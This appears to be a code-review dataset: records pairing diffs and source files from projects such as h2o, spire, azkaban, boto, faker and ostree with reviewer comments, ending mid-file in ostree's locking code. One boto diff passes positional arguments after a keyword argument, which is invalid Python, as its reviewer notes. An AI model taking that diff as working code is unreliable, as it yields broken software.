(RARRAY_LEN(ctx->resumers) == 0) goto Exit; receiver = mrb_ary_pop(mrb, ctx->resumers); } mrb_gc_protect(mrb, receiver); mrb_gc_protect(mrb, input); } if (!(100 <= status && status <= 999)) { mrb->exc = mrb_obj_ptr(mrb_exc_new_str_lit(mrb, E_RUNTIME_ERROR, "status returned from rack app is out of range")); goto GotException; } generator = h2o_mruby_get_generator(mrb, mrb_ary_entry(output, 3)); /* send the response (unless req is already closed) */ if (generator == NULL) goto Exit; assert(generator->req != NULL); if (generator->req->_generator != NULL) { mrb->exc = mrb_obj_ptr(mrb_exc_new_str_lit(mrb, E_RUNTIME_ERROR, "unexpectedly received a rack response")); goto GotException; } if (send_response(generator, status, output, is_delegate) != 0) goto GotException; goto Exit; GotException: handle_exception(ctx, generator); Exit: ctx->shared->current_context = old_ctx; } h2o_mruby_handler_t *h2o_mruby_register(h2o_pathconf_t *pathconf, h2o_mruby_config_vars_t *vars) { h2o_mruby_handler_t *handler = (void *)h2o_create_handler(pathconf, sizeof(*handler)); handler->super.on_context_init = on_context_init; handler->super.on_context_dispose = on_context_dispose; handler->super.dispose = on_handler_dispose; handler->super.on_req = on_req; handler->config.source = h2o_strdup(NULL, vars->source.base, vars->source.len); if (vars->path != NULL) handler->config.path = h2o_strdup(NULL, vars->path, SIZE_MAX).base; handler->config.lineno = vars->lineno; return handler; } mrb_value h2o_mruby_each_to_array(h2o_mruby_shared_context_t *shared_ctx, mrb_value src) { return mrb_funcall_argv(shared_ctx->mrb, mrb_ary_entry(shared_ctx->constants, H2O_MRUBY_PROC_EACH_TO_ARRAY), shared_ctx->symbols.sym_call, 1, &src); } static int iterate_headers_handle_pair(h2o_mruby_shared_context_t *shared_ctx, mrb_value name, mrb_value value, int (*cb)(h2o_mruby_shared_context_t *, h2o_iovec_t, h2o_iovec_t, void *), void *cb_data) { mrb_state *mrb = shared_ctx->mrb; /* convert name and value to string */ name = h2o_mruby_to_str(mrb, name); if (mrb->exc != NULL) return -1; value = h2o_mruby_to_str(mrb, value); if (mrb->exc != NULL) return -1; /* call the callback, splitting the values with '\n' */ const char *vstart = RSTRING_PTR(value), *vend = vstart + RSTRING_LEN(value), *eol; while (1) { for (eol = vstart; eol != vend; ++eol) if (*eol == '\n') break; if (cb(shared_ctx, h2o_iovec_init(RSTRING_PTR(name), RSTRING_LEN(name)), h2o_iovec_init(vstart, eol - vstart), cb_data) != 0) return -1; if (eol == vend) break; vstart = eol + 1; } return 0; } int h2o_mruby_iterate_headers(h2o_mruby_shared_context_t *shared_ctx, mrb_value headers, int (*cb)(h2o_mruby_shared_context_t *, h2o_iovec_t, h2o_iovec_t, void *), void *cb_data) { mrb_state *mrb = shared_ctx->mrb; if (!(mrb_hash_p(headers) || mrb_array_p(headers))) { headers = h2o_mruby_each_to_array(shared_ctx, headers); if (mrb->exc != NULL) return -1; assert(mrb_array_p(headers)); } if (mrb_hash_p(headers)) { mrb_value keys = mrb_hash_keys(mrb, headers); mrb_int i, len = RARRAY_LEN(keys); for (i = 0; i != len; ++i) { mrb_value k = mrb_ary_entry(keys, i); mrb_value v = mrb_hash_get(mrb, headers, k); if (iterate_headers_handle_pair(shared_ctx, k, v, cb, cb_data) != 0) return -1; } } else { assert(mrb_array_p(headers)); mrb_int i, len = RARRAY_LEN(headers); for (i = 0; i != len; ++i) { mrb_value pair = mrb_ary_entry(headers, i); if (!mrb_array_p(pair)) { mrb->exc = mrb_obj_ptr(mrb_exc_new_str_lit(mrb, E_ARGUMENT_ERROR, "array element of headers MUST by an array")); return -1; } if (iterate_headers_handle_pair(shared_ctx, mrb_ary_entry(pair, 0), mrb_ary_entry(pair, 1), cb, cb_data) != 0) return -1; } } return 0; }
1
12,807
Please remove the colon at the end, and merge the PR once the CI succeeds. Thank you for the PR.
h2o-h2o
c
@@ -3,8 +3,5 @@ package tools import ( - _ "github.com/AlekSi/gocoverutil" _ "github.com/golang/protobuf/protoc-gen-go" - _ "github.com/jteeuwen/go-bindata/go-bindata" - _ "github.com/mattn/goveralls" )
1
// +build tools package tools import ( _ "github.com/AlekSi/gocoverutil" _ "github.com/golang/protobuf/protoc-gen-go" _ "github.com/jteeuwen/go-bindata/go-bindata" _ "github.com/mattn/goveralls" )
1
12,476
whoops. this should be protoc-gen-doc, since that is the only bit left that is built out-of-tree (everything else is either downloaded or built via modules already depended on by spire's go.mod)
spiffe-spire
go
@@ -0,0 +1,19 @@ +package azkaban.spi; + +import java.util.Map; + +/** + * Implement this interface to report flow and job events. Event reporter + * can be turned on by setting the property {@code AZKABAN_EVENT_REPORTING_ENABLED} to true. + * + * By default, a KafkaAvroEventReporter is provided. Alternate implementations + * can be provided by setting the property {@code AZKABAN_EVENT_REPORTING_CLASS_PARAM} + * <br><br> + * The constructor will be called with a {@code azkaban.utils.Props} object passed as + * the only parameter. If such a constructor doesn't exist, then the AzkabanEventReporter + * instantiation will fail. + */ +public interface AzkabanEventReporter { + + boolean report(EventType eventType, Map<String, String> metadata); +}
1
1
14,426
The convention is to use <p> see the google style guide and use checkstyle to check. You can change it later.
azkaban-azkaban
java
@@ -134,12 +134,14 @@ class ListElement(list): def startElement(self, name, attrs, connection): for lm in self.list_marker: if name.endswith(lm): - l = ListElement(self.connection, name, self.item_marker, + l = ListElement(self.connection, name, self.list_marker, + self.item_marker, pythonize_name=self.pythonize_name) setattr(self, self.get_name(name), l) return l if name in self.item_marker: e = Element(self.connection, name, parent=self, + self.list_marker, self.item_marker, pythonize_name=self.pythonize_name) self.append(e) return e
1
# Copyright (c) 2010 Mitch Garnaat http://garnaat.org/ # Copyright (c) 2010, Eucalyptus Systems, Inc. # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, dis- # tribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the fol- # lowing conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL- # ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT # SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. import xml.sax import utils class XmlHandler(xml.sax.ContentHandler): def __init__(self, root_node, connection): self.connection = connection self.nodes = [('root', root_node)] self.current_text = '' def startElement(self, name, attrs): self.current_text = '' t = self.nodes[-1][1].startElement(name, attrs, self.connection) if t != None: if isinstance(t, tuple): self.nodes.append(t) else: self.nodes.append((name, t)) def endElement(self, name): self.nodes[-1][1].endElement(name, self.current_text, self.connection) if self.nodes[-1][0] == name: self.nodes.pop() self.current_text = '' def characters(self, content): self.current_text += content def parse(self, s): xml.sax.parseString(s, self) class Element(dict): def __init__(self, connection=None, element_name=None, stack=None, parent=None, list_marker=('Set',), item_marker=('member', 'item'), pythonize_name=False): dict.__init__(self) self.connection = connection self.element_name = element_name self.list_marker = utils.mklist(list_marker) self.item_marker = utils.mklist(item_marker) if stack is None: self.stack = [] else: self.stack = stack self.pythonize_name = pythonize_name self.parent = parent def __getattr__(self, key): if key in self: return self[key] for k in self: e = self[k] if isinstance(e, Element): try: return getattr(e, key) except AttributeError: pass raise AttributeError def get_name(self, name): if self.pythonize_name: name = utils.pythonize_name(name) return name def startElement(self, name, attrs, connection): self.stack.append(name) for lm in self.list_marker: if name.endswith(lm): l = ListElement(self.connection, name, self.list_marker, self.item_marker, self.pythonize_name) self[self.get_name(name)] = l return l if len(self.stack) > 0: element_name = self.stack[-1] e = Element(self.connection, element_name, self.stack, self, self.list_marker, self.item_marker, self.pythonize_name) self[self.get_name(element_name)] = e return (element_name, e) else: return None def endElement(self, name, value, connection): if len(self.stack) > 0: self.stack.pop() value = value.strip() if value: if isinstance(self.parent, Element): self.parent[self.get_name(name)] = value elif isinstance(self.parent, ListElement): self.parent.append(value) class ListElement(list): def __init__(self, connection=None, element_name=None, list_marker=['Set'], item_marker=('member', 'item'), pythonize_name=False): list.__init__(self) self.connection = connection self.element_name = element_name self.list_marker = list_marker self.item_marker = item_marker self.pythonize_name = pythonize_name def get_name(self, name): if self.pythonize_name: name = utils.pythonize_name(name) return name def startElement(self, name, attrs, connection): for lm in self.list_marker: if name.endswith(lm): l = ListElement(self.connection, name, self.item_marker, pythonize_name=self.pythonize_name) setattr(self, self.get_name(name), l) return l if name in self.item_marker: e = Element(self.connection, name, parent=self, pythonize_name=self.pythonize_name) self.append(e) return e else: return None def endElement(self, name, value, connection): if name == self.element_name: if len(self) > 0: empty = [] for e in self: if isinstance(e, Element): if len(e) == 0: empty.append(e) for e in empty: self.remove(e) else: setattr(self, self.get_name(name), value)
1
8,046
Using non-keyword args after the keyword arg (parent-self) will cause a SyntaxError.
boto-boto
py
@@ -277,6 +277,13 @@ module Faker '%08x-%04x-%04x-%04x-%04x%08x' % ary # rubocop:disable Style/FormatString end + def user(*args) + user_hash = {} + args = %w[username email] if args.empty? + args.each { |arg| user_hash[:"#{arg}"] = send(arg) } + user_hash + end + alias user_name username end end
1
# frozen_string_literal: true module Faker class Internet < Base class << self def email(legacy_name = NOT_GIVEN, legacy_separators = NOT_GIVEN, name: nil, separators: nil) warn_for_deprecated_arguments do |keywords| keywords << :name if legacy_name != NOT_GIVEN keywords << :separators if legacy_separators != NOT_GIVEN end if separators [username(specifier: name, separators: separators), domain_name].join('@') else [username(specifier: name), domain_name].join('@') end end def free_email(legacy_name = NOT_GIVEN, name: nil) warn_for_deprecated_arguments do |keywords| keywords << :name if legacy_name != NOT_GIVEN end [username(specifier: name), fetch('internet.free_email')].join('@') end def safe_email(legacy_name = NOT_GIVEN, name: nil) warn_for_deprecated_arguments do |keywords| keywords << :name if legacy_name != NOT_GIVEN end [username(specifier: name), 'example.' + sample(%w[org com net])].join('@') end def username(legacy_specifier = NOT_GIVEN, legacy_separators = NOT_GIVEN, specifier: nil, separators: %w[. _]) warn_for_deprecated_arguments do |keywords| keywords << :specifier if legacy_specifier != NOT_GIVEN keywords << :separators if legacy_separators != NOT_GIVEN end with_locale(:en) do return shuffle(specifier.scan(/[[:word:]]+/)).join(sample(separators)).downcase if specifier.respond_to?(:scan) if specifier.is_a?(Integer) # If specifier is Integer and has large value, Argument error exception is raised to overcome memory full error raise ArgumentError, 'Given argument is too large' if specifier > 10**6 tries = 0 # Don't try forever in case we get something like 1_000_000. result = nil loop do result = username(specifier: nil, separators: separators) tries += 1 break unless result.length < specifier && tries < 7 end return result * (specifier / result.length + 1) if specifier.positive? elsif specifier.is_a?(Range) tries = 0 result = nil loop do result = username(specifier: specifier.min, separators: separators) tries += 1 break unless !specifier.include?(result.length) && tries < 7 end return result[0...specifier.max] end sample([ Char.prepare(Name.first_name), [Name.first_name, Name.last_name].map do |name| Char.prepare(name) end.join(sample(separators)) ]) end end ## # Produces a randomized string of characters # # @param [Integer] min_length # @param [Integer] max_length # @param [Boolean] mix_case # @param [Boolean] special_characters # # @return [String] # # @example Faker::Internet.password #=> "Vg5mSvY1UeRg7" # @example Faker::Internet.password(min_length: 8) #=> "YfGjIk0hGzDqS0" # @example Faker::Internet.password(min_length: 10, max_length: 20) #=> "EoC9ShWd1hWq4vBgFw" # @example Faker::Internet.password(min_length: 10, max_length: 20, mix_case: true) #=> "3k5qS15aNmG" # @example Faker::Internet.password(min_length: 10, max_length: 20, mix_case: true, special_characters: true) #=> "*%NkOnJsH4" # # @faker.version 2.1.3 # rubocop:disable Metrics/ParameterLists def password(legacy_min_length = NOT_GIVEN, legacy_max_length = NOT_GIVEN, legacy_mix_case = NOT_GIVEN, legacy_special_characters = NOT_GIVEN, min_length: 8, max_length: 16, mix_case: true, special_characters: false) warn_for_deprecated_arguments do |keywords| keywords << :min_length if legacy_min_length != NOT_GIVEN keywords << :max_length if legacy_max_length != NOT_GIVEN keywords << :mix_case if legacy_mix_case != NOT_GIVEN keywords << :special_characters if legacy_special_characters != NOT_GIVEN end min_alpha = mix_case ? 2 : 0 temp = Lorem.characters(number: min_length, min_alpha: min_alpha) diff_length = max_length - min_length if diff_length.positive? diff_rand = rand(diff_length + 1) temp += Lorem.characters(number: diff_rand) end if mix_case alpha_count = 0 temp.chars.each_with_index do |char, index| if char =~ /[[:alpha:]]/ temp[index] = char.upcase if alpha_count.even? alpha_count += 1 end end end if special_characters chars = %w[! @ # $ % ^ & *] rand(1..min_length).times do |i| temp[i] = chars[rand(chars.length)] end end temp end def domain_name(legacy_subdomain = NOT_GIVEN, subdomain: false) warn_for_deprecated_arguments do |keywords| keywords << :subdomain if legacy_subdomain != NOT_GIVEN end with_locale(:en) do domain_elements = [Char.prepare(domain_word), domain_suffix] domain_elements.unshift(Char.prepare(domain_word)) if subdomain domain_elements.join('.') end end def fix_umlauts(legacy_string = NOT_GIVEN, string: '') warn_for_deprecated_arguments do |keywords| keywords << :string if legacy_string != NOT_GIVEN end Char.fix_umlauts(string) end def domain_word with_locale(:en) { Char.prepare(Company.name.split(' ').first) } end def domain_suffix fetch('internet.domain_suffix') end def mac_address(legacy_prefix = NOT_GIVEN, prefix: '') warn_for_deprecated_arguments do |keywords| keywords << :prefix if legacy_prefix != NOT_GIVEN end prefix_digits = prefix.split(':').map { |d| d.to_i(16) } address_digits = Array.new((6 - prefix_digits.size)) { rand(256) } (prefix_digits + address_digits).map { |d| format('%02x', d) }.join(':') end def ip_v4_address [rand_in_range(0, 255), rand_in_range(0, 255), rand_in_range(0, 255), rand_in_range(0, 255)].join('.') end def private_ip_v4_address addr = nil loop do addr = ip_v4_address break if private_net_checker[addr] end addr end def public_ip_v4_address addr = nil loop do addr = ip_v4_address break unless reserved_net_checker[addr] end addr end def private_nets_regex [ /^10\./, # 10.0.0.0 - 10.255.255.255 /^100\.(6[4-9]|[7-9]\d|1[0-1]\d|12[0-7])\./, # 100.64.0.0 - 100.127.255.255 /^127\./, # 127.0.0.0 - 127.255.255.255 /^169\.254\./, # 169.254.0.0 - 169.254.255.255 /^172\.(1[6-9]|2\d|3[0-1])\./, # 172.16.0.0 - 172.31.255.255 /^192\.0\.0\./, # 192.0.0.0 - 192.0.0.255 /^192\.168\./, # 192.168.0.0 - 192.168.255.255 /^198\.(1[8-9])\./ # 198.18.0.0 - 198.19.255.255 ] end def private_net_checker ->(addr) { private_nets_regex.any? { |net| net =~ addr } } end def reserved_nets_regex [ /^0\./, # 0.0.0.0 - 0.255.255.255 /^192\.0\.2\./, # 192.0.2.0 - 192.0.2.255 /^192\.88\.99\./, # 192.88.99.0 - 192.88.99.255 /^198\.51\.100\./, # 198.51.100.0 - 198.51.100.255 /^203\.0\.113\./, # 203.0.113.0 - 203.0.113.255 /^(22[4-9]|23\d)\./, # 224.0.0.0 - 239.255.255.255 /^(24\d|25[0-5])\./ # 240.0.0.0 - 255.255.255.254 and 255.255.255.255 ] end def reserved_net_checker ->(addr) { (private_nets_regex + reserved_nets_regex).any? { |net| net =~ addr } } end def ip_v4_cidr "#{ip_v4_address}/#{rand(1..31)}" end def ip_v6_address (1..8).map { rand(65_536).to_s(16) }.join(':') end def ip_v6_cidr "#{ip_v6_address}/#{rand(1..127)}" end def url(legacy_host = NOT_GIVEN, legacy_path = NOT_GIVEN, legacy_scheme = NOT_GIVEN, host: domain_name, path: "/#{username}", scheme: 'http') # rubocop:enable Metrics/ParameterLists warn_for_deprecated_arguments do |keywords| keywords << :host if legacy_host != NOT_GIVEN keywords << :path if legacy_path != NOT_GIVEN keywords << :scheme if legacy_scheme != NOT_GIVEN end "#{scheme}://#{host}#{path}" end def slug(legacy_words = NOT_GIVEN, legacy_glue = NOT_GIVEN, words: nil, glue: nil) warn_for_deprecated_arguments do |keywords| keywords << :words if legacy_words != NOT_GIVEN keywords << :glue if legacy_glue != NOT_GIVEN end glue ||= sample(%w[- _]) (words || Faker::Lorem.words(number: 2).join(' ')).delete(',.').gsub(' ', glue).downcase end def device_token shuffle(rand(16**64).to_s(16).rjust(64, '0').chars.to_a).join end def user_agent(legacy_vendor = NOT_GIVEN, vendor: nil) warn_for_deprecated_arguments do |keywords| keywords << :vendor if legacy_vendor != NOT_GIVEN end agent_hash = translate('faker.internet.user_agent') agents = vendor.respond_to?(:to_sym) && agent_hash[vendor.to_sym] || agent_hash[sample(agent_hash.keys)] sample(agents) end def uuid # borrowed from: https://github.com/ruby/ruby/blob/d48783bb0236db505fe1205d1d9822309de53a36/lib/securerandom.rb#L250 ary = Faker::Config.random.bytes(16).unpack('NnnnnN') ary[2] = (ary[2] & 0x0fff) | 0x4000 ary[3] = (ary[3] & 0x3fff) | 0x8000 '%08x-%04x-%04x-%04x-%04x%08x' % ary # rubocop:disable Style/FormatString end alias user_name username end end end
1
9,334
I think you'll want to add some YARD docs to this method to get the PR approved
faker-ruby-faker
rb
@@ -4452,12 +4452,13 @@ ostree_repo_query_object_storage_size (OstreeRepo *self, * @self: Repo * @objtype: Object type * @sha256: ASCII checksum - * @out_variant: (out) (transfer full): Metadata + * @out_variant: (out) (nullable) (transfer full): Metadata * @error: Error * * Attempt to load the metadata object @sha256 of type @objtype if it * exists, storing the result in @out_variant. If it doesn't exist, - * %NULL is returned. + * @out_variant will be set to %NULL and the function will still + * return TRUE. */ gboolean ostree_repo_load_variant_if_exists (OstreeRepo *self,
1
/* * Copyright (C) 2011 Colin Walters <[email protected]> * Copyright (C) 2015 Red Hat, Inc. * * SPDX-License-Identifier: LGPL-2.0+ * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, write to the * Free Software Foundation, Inc., 59 Temple Place - Suite 330, * Boston, MA 02111-1307, USA. * * Author: Colin Walters <[email protected]> */ #include "config.h" #include <glib-unix.h> #include <gio/gunixinputstream.h> #include <gio/gunixoutputstream.h> #include <gio/gfiledescriptorbased.h> #include "libglnx.h" #include "otutil.h" #include <glnx-console.h> #include <linux/magic.h> #include "ostree-core-private.h" #include "ostree-sysroot-private.h" #include "ostree-remote-private.h" #include "ostree-repo-private.h" #include "ostree-repo-file.h" #include "ostree-repo-file-enumerator.h" #include "ostree-gpg-verifier.h" #include "ostree-repo-static-delta-private.h" #include "ot-fs-utils.h" #include "ostree-autocleanups.h" #include <locale.h> #include <glib/gstdio.h> #include <sys/file.h> #include <sys/statvfs.h> #include <sys/statfs.h> #define REPO_LOCK_DISABLED (-2) #define REPO_LOCK_BLOCKING (-1) /* ABI Size checks for ostree-repo.h, only for LP64 systems; * https://en.wikipedia.org/wiki/64-bit_computing#64-bit_data_models * * To generate this data, I used `pahole` from gdb. More concretely, `gdb --args * /usr/bin/ostree`, then `start`, (to ensure debuginfo was loaded), then e.g. * `$ pahole OstreeRepoTransactionStats`. */ #if __SIZEOF_POINTER__ == 8 && __SIZEOF_LONG__ == 8 && __SIZEOF_INT__ == 4 G_STATIC_ASSERT(sizeof(OstreeRepoTransactionStats) == sizeof(int) * 4 + 8 * 5); G_STATIC_ASSERT(sizeof(OstreeRepoImportArchiveOptions) == sizeof(int) * 9 + 4 + sizeof(void*) * 8); G_STATIC_ASSERT(sizeof(OstreeRepoExportArchiveOptions) == sizeof(int) * 9 + 4 + 8 + sizeof(void*) * 8); G_STATIC_ASSERT(sizeof(OstreeRepoCheckoutAtOptions) == sizeof(OstreeRepoCheckoutMode) + sizeof(OstreeRepoCheckoutOverwriteMode) + sizeof(int)*6 + sizeof(int)*5 + sizeof(int) + sizeof(void*)*2 + sizeof(int)*6 + sizeof(void*)*7); G_STATIC_ASSERT(sizeof(OstreeRepoCommitTraverseIter) == sizeof(int) + sizeof(int) + sizeof(void*) * 10 + 130 + 6); /* 6 byte hole */ G_STATIC_ASSERT(sizeof(OstreeRepoPruneOptions) == sizeof(OstreeRepoPruneFlags) + 4 + sizeof(void*) + sizeof(int) * 12 + sizeof(void*) * 7); #endif /** * SECTION:ostree-repo * @title: OstreeRepo: Content-addressed object store * @short_description: A git-like storage system for operating system binaries * * The #OstreeRepo is like git, a content-addressed object store. * Unlike git, it records uid, gid, and extended attributes. * * There are four possible "modes" for an #OstreeRepo; %OSTREE_REPO_MODE_BARE * is very simple - content files are represented exactly as they are, and * checkouts are just hardlinks. %OSTREE_REPO_MODE_BARE_USER is similar, except * the uid/gids are not set on the files, and checkouts as hardlinks work only * for user checkouts. %OSTREE_REPO_MODE_BARE_USER_ONLY is the same as * BARE_USER, but all metadata is not stored, so it can only be used for user * checkouts. This mode does not require xattrs. A %OSTREE_REPO_MODE_ARCHIVE * (also known as %OSTREE_REPO_MODE_ARCHIVE_Z2) repository in contrast stores * content files zlib-compressed. It is suitable for non-root-owned * repositories that can be served via a static HTTP server. * * Creating an #OstreeRepo does not invoke any file I/O, and thus needs * to be initialized, either from existing contents or as a new * repository. If you have an existing repo, use ostree_repo_open() * to load it from disk and check its validity. To initialize a new * repository in the given filepath, use ostree_repo_create() instead. * * To store content in the repo, first start a transaction with * ostree_repo_prepare_transaction(). Then create a * #OstreeMutableTree, and apply functions such as * ostree_repo_write_directory_to_mtree() to traverse a physical * filesystem and write content, possibly multiple times. * * Once the #OstreeMutableTree is complete, write all of its metadata * with ostree_repo_write_mtree(), and finally create a commit with * ostree_repo_write_commit(). * * ## Collection IDs * * A collection ID is a globally unique identifier which, if set, is used to * identify refs from a repository which are mirrored elsewhere, such as in * mirror repositories or peer to peer networks. * * This is separate from the `collection-id` configuration key for a remote, which * is used to store the collection ID of the repository that remote points to. * * The collection ID should only be set on an #OstreeRepo if it is the canonical * collection for some refs. * * A collection ID must be a reverse DNS name, where the domain name is under the * control of the curator of the collection, so they can demonstrate ownership * of the collection. The later elements in the reverse DNS name can be used to * disambiguate between multiple collections from the same curator. For example, * `org.exampleos.Main` and `org.exampleos.Apps`. For the complete format of * collection IDs, see ostree_validate_collection_id(). */ typedef struct { GObjectClass parent_class; #ifndef OSTREE_DISABLE_GPGME void (*gpg_verify_result) (OstreeRepo *self, const char *checksum, OstreeGpgVerifyResult *result); #endif } OstreeRepoClass; enum { PROP_0, PROP_PATH, PROP_REMOTES_CONFIG_DIR, PROP_SYSROOT_PATH }; enum { GPG_VERIFY_RESULT, LAST_SIGNAL }; #ifndef OSTREE_DISABLE_GPGME static guint signals[LAST_SIGNAL] = { 0 }; #endif G_DEFINE_TYPE (OstreeRepo, ostree_repo, G_TYPE_OBJECT) #define SYSCONF_REMOTES SHORTENED_SYSCONFDIR "/ostree/remotes.d" /* Repository locking * * To guard against objects being deleted (e.g., prune) while they're in * use by another operation is accessing them (e.g., commit), the * repository must be locked by concurrent writers. * * The locking is implemented by maintaining a thread local table of * lock stacks per repository. This allows thread safe locking since * each thread maintains its own lock stack. See the OstreeRepoLock type * below. * * The actual locking is done using either open file descriptor locks or * flock locks. This allows the locking to work with concurrent * processes. The lock file is held on the ".lock" file within the * repository. * * The intended usage is to take a shared lock when writing objects or * reading objects in critical sections. Exclusive locks are taken when * deleting objects. * * To allow fine grained locking within libostree, the lock is * maintained as a stack. The core APIs then push or pop from the stack. * When pushing or popping a lock state identical to the existing or * next state, the stack is simply updated. Only when upgrading or * downgrading the lock (changing to/from unlocked, pushing exclusive on * shared or popping exclusive to shared) are actual locking operations * performed. */ static void free_repo_lock_table (gpointer data) { GHashTable *lock_table = data; if (lock_table != NULL) { g_debug ("Free lock table"); g_hash_table_destroy (lock_table); } } static GPrivate repo_lock_table = G_PRIVATE_INIT (free_repo_lock_table); typedef struct { int fd; GQueue stack; } OstreeRepoLock; typedef struct { guint len; int state; const char *name; } OstreeRepoLockInfo; static void repo_lock_info (OstreeRepoLock *lock, OstreeRepoLockInfo *out_info) { g_assert (lock != NULL); g_assert (out_info != NULL); OstreeRepoLockInfo info; info.len = g_queue_get_length (&lock->stack); if (info.len == 0) { info.state = LOCK_UN; info.name = "unlocked"; } else { info.state = GPOINTER_TO_INT (g_queue_peek_head (&lock->stack)); info.name = (info.state == LOCK_EX) ? "exclusive" : "shared"; } *out_info = info; } static void free_repo_lock (gpointer data) { OstreeRepoLock *lock = data; if (lock != NULL) { OstreeRepoLockInfo info; repo_lock_info (lock, &info); g_debug ("Free lock: state=%s, depth=%u", info.name, info.len); g_queue_clear (&lock->stack); if (lock->fd >= 0) { g_debug ("Closing repo lock file"); (void) close (lock->fd); } g_free (lock); } } /* Wrapper to handle flock vs OFD locking based on GLnxLockFile */ static gboolean do_repo_lock (int fd, int flags) { int res; #ifdef F_OFD_SETLK struct flock fl = { .l_type = (flags & ~LOCK_NB) == LOCK_EX ? F_WRLCK : F_RDLCK, .l_whence = SEEK_SET, .l_start = 0, .l_len = 0, }; res = TEMP_FAILURE_RETRY (fcntl (fd, (flags & LOCK_NB) ? F_OFD_SETLK : F_OFD_SETLKW, &fl)); #else res = -1; errno = EINVAL; #endif /* Fallback to flock when OFD locks not available */ if (res < 0) { if (errno == EINVAL) res = TEMP_FAILURE_RETRY (flock (fd, flags)); if (res < 0) return FALSE; } return TRUE; } /* Wrapper to handle flock vs OFD unlocking based on GLnxLockFile */ static gboolean do_repo_unlock (int fd, int flags) { int res; #ifdef F_OFD_SETLK struct flock fl = { .l_type = F_UNLCK, .l_whence = SEEK_SET, .l_start = 0, .l_len = 0, }; res = TEMP_FAILURE_RETRY (fcntl (fd, (flags & LOCK_NB) ? F_OFD_SETLK : F_OFD_SETLKW, &fl)); #else res = -1; errno = EINVAL; #endif /* Fallback to flock when OFD locks not available */ if (res < 0) { if (errno == EINVAL) res = TEMP_FAILURE_RETRY (flock (fd, LOCK_UN | flags)); if (res < 0) return FALSE; } return TRUE; } static gboolean push_repo_lock (OstreeRepo *self, OstreeRepoLockType lock_type, gboolean blocking, GError **error) { int flags = (lock_type == OSTREE_REPO_LOCK_EXCLUSIVE) ? LOCK_EX : LOCK_SH; if (!blocking) flags |= LOCK_NB; GHashTable *lock_table = g_private_get (&repo_lock_table); if (lock_table == NULL) { g_debug ("Creating repo lock table"); lock_table = g_hash_table_new_full (NULL, NULL, NULL, (GDestroyNotify)free_repo_lock); g_private_set (&repo_lock_table, lock_table); } OstreeRepoLock *lock = g_hash_table_lookup (lock_table, self); if (lock == NULL) { lock = g_new0 (OstreeRepoLock, 1); g_queue_init (&lock->stack); g_debug ("Opening repo lock file"); lock->fd = TEMP_FAILURE_RETRY (openat (self->repo_dir_fd, ".lock", O_CREAT | O_RDWR | O_CLOEXEC, DEFAULT_REGFILE_MODE)); if (lock->fd < 0) { free_repo_lock (lock); return glnx_throw_errno_prefix (error, "Opening lock file %s/.lock failed", gs_file_get_path_cached (self->repodir)); } g_hash_table_insert (lock_table, self, lock); } OstreeRepoLockInfo info; repo_lock_info (lock, &info); g_debug ("Push lock: state=%s, depth=%u", info.name, info.len); if (info.state == LOCK_EX) { g_debug ("Repo already locked exclusively, extending stack"); g_queue_push_head (&lock->stack, GINT_TO_POINTER (LOCK_EX)); } else { int next_state = (flags & LOCK_EX) ? LOCK_EX : LOCK_SH; const char *next_state_name = (flags & LOCK_EX) ? "exclusive" : "shared"; g_debug ("Locking repo %s", next_state_name); if (!do_repo_lock (lock->fd, flags)) return glnx_throw_errno_prefix (error, "Locking repo %s failed", next_state_name); g_queue_push_head (&lock->stack, GINT_TO_POINTER (next_state)); } return TRUE; } static gboolean pop_repo_lock (OstreeRepo *self, gboolean blocking, GError **error) { int flags = blocking ? 0 : LOCK_NB; GHashTable *lock_table = g_private_get (&repo_lock_table); g_return_val_if_fail (lock_table != NULL, FALSE); OstreeRepoLock *lock = g_hash_table_lookup (lock_table, self); g_return_val_if_fail (lock != NULL, FALSE); g_return_val_if_fail (lock->fd != -1, FALSE); OstreeRepoLockInfo info; repo_lock_info (lock, &info); g_return_val_if_fail (info.len > 0, FALSE); g_debug ("Pop lock: state=%s, depth=%u", info.name, info.len); if (info.len > 1) { int next_state = GPOINTER_TO_INT (g_queue_peek_nth (&lock->stack, 1)); /* Drop back to the previous lock state if it differs */ if (next_state != info.state) { /* We should never drop from shared to exclusive */ g_return_val_if_fail (next_state == LOCK_SH, FALSE); g_debug ("Returning lock state to shared"); if (!do_repo_lock (lock->fd, next_state | flags)) return glnx_throw_errno_prefix (error, "Setting repo lock to shared failed"); } else g_debug ("Maintaining lock state as %s", info.name); } else { /* Lock stack will be empty, unlock */ g_debug ("Unlocking repo"); if (!do_repo_unlock (lock->fd, flags)) return glnx_throw_errno_prefix (error, "Unlocking repo failed"); } g_queue_pop_head (&lock->stack); return TRUE; } /* * ostree_repo_lock_push: * @self: a #OstreeRepo * @lock_type: the type of lock to acquire * @cancellable: a #GCancellable * @error: a #GError * * Takes a lock on the repository and adds it to the lock stack. If @lock_type * is %OSTREE_REPO_LOCK_SHARED, a shared lock is taken. If @lock_type is * %OSTREE_REPO_LOCK_EXCLUSIVE, an exclusive lock is taken. The actual lock * state is only changed when locking a previously unlocked repository or * upgrading the lock from shared to exclusive. If the requested lock state is * unchanged or would represent a downgrade (exclusive to shared), the lock * state is not changed and the stack is simply updated. * * ostree_repo_lock_push() waits for the lock depending on the repository's * lock-timeout-secs configuration. When lock-timeout-secs is -1, a blocking lock is * attempted. Otherwise, the lock is taken non-blocking and * ostree_repo_lock_push() will sleep synchronously 